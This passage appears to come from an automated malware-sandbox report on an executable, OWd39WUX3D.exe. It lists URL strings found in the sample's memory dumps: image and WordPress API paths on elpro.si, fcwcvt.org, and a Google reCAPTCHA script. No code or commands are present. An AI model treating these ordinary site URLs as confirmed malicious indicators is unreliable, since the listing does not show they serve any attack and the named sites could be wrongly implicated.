00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg)
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Eksplozivna-okolja.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/preloader.gif)
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-100x100.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-150x150.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-300x300.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-331x330.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-600x599.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-64x64.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-661x660.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-768x767.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-100x100.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-150x150.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-300x300.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-331x330.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-600x599.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-64x64.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-661x660.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-768x767.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/04/Posnetek-zaslona-2023-04-26-112304-100x100.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/04/Posnetek-zaslona-2023-04-26-112304-150x150.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/04/Posnetek-zaslona-2023-04-26-112304-300x300.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-100x100.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-300x300.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/08/Nivo-4-355x200.png
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/08/poplave-2023-355x200.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/08/poplave-2023-585x330.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/08/poplave-2023-600x337.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/08/poplave-2023-64x36.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/08/poplave-2023-768x432.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/08/poplave-2023.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/PLATINA-skupna_urejena-2-355x200.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F&format=xml
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/wp/v2/pages/2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/xmlrpc.php?rsd
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.385548629.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fcwcvt.org/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LdeMu0ZAAAAAFtmpTrTqJfRdq-yIJmXMOBmYWGU&ver=3.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 